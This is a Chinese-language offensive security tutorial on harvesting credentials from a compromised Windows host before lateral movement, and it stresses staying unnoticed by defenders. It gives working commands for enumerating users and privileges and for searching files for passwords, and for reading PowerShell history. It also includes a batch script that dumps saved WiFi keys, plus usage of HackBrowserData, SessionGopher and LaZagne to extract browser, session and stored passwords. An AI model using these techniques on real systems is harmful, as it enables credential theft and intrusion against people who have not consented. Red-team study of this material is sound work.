## 一、简介
- 凭证收集发生在拿下主机后,希望进行横向移动时采取的动作。相对于权限提升等手段,凭证收集的动静较小,不易被安全管理人员察觉。
- 一般比较有价值的凭证有账户密码、`RDP会话`、`Chrome保存账密`以及其他第三方软件保存的用户信息。
## 二、枚举
- 拿下主机后,第一步需要做的是确认这台主机的信息,譬如操作系统、补丁情况、已安装程序等信息,而后再根据这些信息来进行深度研究利用。
### 2.1 获取主机整体信息:
- `systemtminfo`
### 2.2 获取主机补丁情况:
- `wmic qfe`
![image-20231127145105571](https://picture.gotarget.top/202311271453901.png)
- `Get-HotFix `
![image-20231127145134064](https://picture.gotarget.top/202311271453386.png)
### 2.3 已经安装了的程序
- `wmic product get name`
![image-20231127152259122](https://picture.gotarget.top/202311271523611.png)
- 获取帮助:`wmic product get /?`
![image-20231127152243026](https://picture.gotarget.top/202311271523841.png)
### 2.4 获取进程应用和服务的关系
- `tasklist /svc`
![image-20231127152732804](https://picture.gotarget.top/202311271527069.png)
### 2.5 获取账户信息
#### 2.5.1 :查询账户登录信息
- `query user`
![image-20231127154141848](https://picture.gotarget.top/202311271719277.png)
#### 2.5.2 :查询账户特权
- `whoami /priv`
![image-20231127154245671](https://picture.gotarget.top/202311271719645.png)
- 补充
- 监控特权授予新登录账户Eevent-ID:`4672`
#### 2.5.3 :查询密码策略
- `net accounts`
![image-20231127154421364](https://picture.gotarget.top/202311271719516.png)
#### 2.5.4 其他
- 查询账户详细信息:`net user adil`
- 查询本账户所属哪个组:`whoami /groups`
- 获取本地系统所有用户:`net user`
- 获取整个域内所有用户:`net user /domain`
- 查询本地系统某个组内的账户:`net localgroup administrators`
## 三、信息收集
### 3.1 findstr
#### 3.1.1 帮助命令
- `findstr /?`
![image-20231127170842722](https://picture.gotarget.top/202311271719220.png)
#### 3.1.2 搜索字符串并打印文件名
- `findstr /SIM /C:"password" *.txt *.cfg *.xml *.config *.ini`
- `/S` :在当前目录和所有子目录中搜索匹配文件
- `/i`:指定搜索不分大小写
- `/M`:如果文件含有匹配项,只打印其文件名
- `/c`:使用指定字符串作为文字搜索字符串
- 指定路径开始搜索:
- `findstr /D:C:\ /SI /C:"password" *.txt *.cfg *.xml *.config *.ini *.md`
- `/D`:指定开始的搜索路径
![image-20231127171914528](https://picture.gotarget.top/202311271719066.png)
#### 3.1.3 搜索字符串并打印匹配字符串
- `findstr /SI /C:"password" *.txt`
![image-20231127173156704](https://picture.gotarget.top/202311271732449.png)
### 3.2 powershell
#### 3.2.1 历史命令
- 查看本账户`powershell`历史命令保存路径
- `(Get-PSReadLineOption).HistorySavePath`
- 默认账户`powershell`历史命令保存路径
- `C:\Users\<username>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt`
- 注意:普通账户只能查看本账户的历史命令
![image-20231128131755898](https://picture.gotarget.top/202311281320718.png)
#### 3.2.2 defender状态
- 查看defender状态信息
- ` Get-MpComputerStatus`
![image-20231128131920721](https://picture.gotarget.top/202311281320491.png)
### 3.2.3 搜索指定类型文件
- `Get-ChildItem c:\ -Recurse -Include *.rdp,*.conf,*.vnc,x.cred -ErrorAction Ignore`
- `-Recurse`:遍历搜索模式
- `-ErrorAction Ignore` :忽略执行过程中出现的错误(防止权限不足报错)
![image-20231128132315941](https://picture.gotarget.top/202311281324892.png)
## 四、其他信息收集
### 4.1 浏览器账密
- `HackBrowserData`:[传送门](https://github.com/moonD4rk/HackBrowserData/blob/master/README_ZH.md)
- `hack-browser-data-windows-64bit.exe -b all -f json --dir results -zip`
- 使用所有的密码打包模块成json文件,保存到zip压缩文件中
- 包含内容:密码、 Cookies、书签、历史记录
- 注意:需要在浏览器关闭的情况下使用全模块,否则在读取`Cookies`时将会报错。
- 效果示例:
![image-20231128134731115](https://picture.gotarget.top/202311281347947.png)
![image-20231128134751942](https://picture.gotarget.top/202311281347222.png)
- 使用视频示例:[B站](https://www.bilibili.com/video/BV1eU4y1z7si/?vd_source=f75b67cb253a8b4db74b34c26b797793)
### 4.2 WIFI密码收集
- 脚本:
```bat
@echo off
chcp 65001>nul
for /f "tokens=1* delims=:" %%i in ('netsh wlan show profiles ^| findstr /c:"All User Profile"') do (
call :GetPass %%j
)
pause
goto :eof
:GetPass
echo WiFi : %*
for /f "delims=" %%a in ('netsh wlan show profile name^="%*" key^=clear ^| findstr /c:"Key Content"') do (
echo %%a
)
goto :eof
```
- 效果示例:
![image-20231128135218028](https://picture.gotarget.top/202311281352501.png)
### 4.3 凭证密钥收集
- 挖掘`PuTTY、WinSCP、FileZilla、RDP`保存的会话信息
- 项目地址:[传送门](https://github.com/Arvanaghi/SessionGopher)
- 效果示例:
![image-20231128140148963](https://picture.gotarget.top/202311281401795.png)
### 4.3 瑞士军刀
- `Lazagne`是一款包含大量凭证收集模块的工具,几乎包含以上的全部功能,甚至更多功能模块。值得学习使用。
- 项目地址:[传送门](https://github.com/AlessandroZ/LaZagne/)
![image-20231128140851401](https://picture.gotarget.top/202311281411247.png)
![image-20231128141222089](https://picture.gotarget.top/202311281412464.png)
凭证收集—Windows